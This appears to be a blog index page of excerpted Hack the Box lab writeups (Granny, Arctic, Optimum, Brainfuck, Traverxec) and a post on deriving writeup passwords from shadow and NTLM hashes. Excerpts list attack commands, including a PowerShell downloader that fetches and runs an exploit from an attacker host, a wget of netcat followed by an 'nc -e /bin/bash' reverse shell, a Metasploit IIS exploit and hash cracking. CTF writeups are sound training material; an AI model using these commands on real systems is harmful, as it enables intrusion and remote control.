Passwords for the Active Hack the Box machines 5 (3)

Passwords for the Active Hack the Box machines

New methods For linux -cat /etc/shadow Example this. root:$6$YIFGN9YscCV72BjFtx/tehbc7sQTJp09c5.:18277:0:99999:7:::So use the highlighted part as the password.So password = YIFGN9YscCV72BjFtx/ For Windows Use ntlm hash Example Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c:::  password = 31d6cfe0d16ae931b73c59d7e0c Old methods For linux 1- cat /etc/shadow2-copy whole hash(root)root:$6$YIFGN9YscCV72BjFtx/tehbc7sQTJp09c5.:18277:0:99999:7:::3-Then find it’s MD5 sum and that’s your password for writeup For windows 1-Find root hash with hashdump.exe … Read more

Hackthebox Granny writeup 0 (0)

Hackthebox Granny writeup

Commands used 1-nmap -sC -v 10.10.10.152-msfconsle3-use exploit/windows/iis/iis_webdav_scstoragepathfromurl4-set targeturi /_vti_bin5-set rhosts 10.10.14.205-set lhost your_ip6-set lport 12347-run Steps involved Steps invloved 1-Port Scanning2-Searching exploit for IIS 6.03-Exploiting IIS with metasploit Port scan Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-16 23:06 EDT NSE: Loaded 119 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 23:06 Completed NSE … Read more

Hack the box Arctic writeup 2 (1)

Hack the box Arctic writeup

Steps involved 1-Port scanning2-Exploiting ColdFusion 8 on port 85003-Cracking hash4-uploading reverse shell5-privilage escalation 6-Getting root.txt Commands Used 1-nmap -sC -sV -O -p- -v -oV 10.10.10.112-hash-identifier3-john hash –wordlist=/root/Desktop/rockyou.txt4-echo $webclient = New-Object System.Net.WebClient >>wget.ps15-echo $url = “http://10.10.14.20:8000/Chimichurri.exe” >>wget.ps16-echo $file = “exploit.exe” >>wget.ps17- echo $webclient.DownloadFile($url,$file) >>wget.ps1 8-powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 Port Scanning Nmap 7.70 … Read more

Hack the box Optimum writeup 0 (0)

hack the box optimum writeup

Brief It is a easy windows machine from hack the box.It’s easy but root part is little hard and more enumeration is required for it.But once you get it’s so easy. It has only a single port .And the walk through is around HFS exploits using metasploit.And then privilege escalation through a integer overflow. Steps … Read more

Hack the box Brainfuck writeup 4.8 (10)

Hack the box Brainfuck writeup

Brief It is a retired machine from hack the box. It’s a linux insane machine . Steps involved 1-Port scanning2-Enumerating SSLcertificates3-Editing our host file4-Exploiting WP Support Plus5-Getting email password6-Getting creds for secret form7-Decoding Vigenere ciphers8-Decrypting the id_rsa keyprase9-Getting user.txt10-Decrypting the root.txt11-Getting root.txt Commands involved 1-nmap -sC -sV -O -v -oV 10.10.10.172-nano /etc/hosts3-wpscan –url https://brainfuck.htb –disable-tls-checks4-searchsploit … Read more

Hack the box(HTB) Traverxec write up 0 (0)

Hack the box(HTB) Traverxec write up

Commands used 1-nmap -sC -sV -O -v -oA initial 10.10.10.42-python getshell.py 10.10.10.165 80 “cd / && mkdir tmp”3-python getshell.py 10.10.10.165 80 “cd /tmp && wget http://10.10.14.20:8000/nc”4-python getshell.py 10.10.10.165 80 “/tmp/nc -e /bin/bash 10.10.14.20 4444″5-cd /home/david/public_www6-base64 backup-ssh-identity-files.tgz7-base64 -d file >>new file8-/usr/share/john/ssh2john.py id_rsa9-john hash –wordlist=/root/Desktop/rockyou.txt10-ssh -i id_rsa [email protected]/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service12-!/bin/bash Steps invloved 1-Enumeration2-Exploiting nostromo 1.9.63-Getting a … Read more

X
wpChatIcon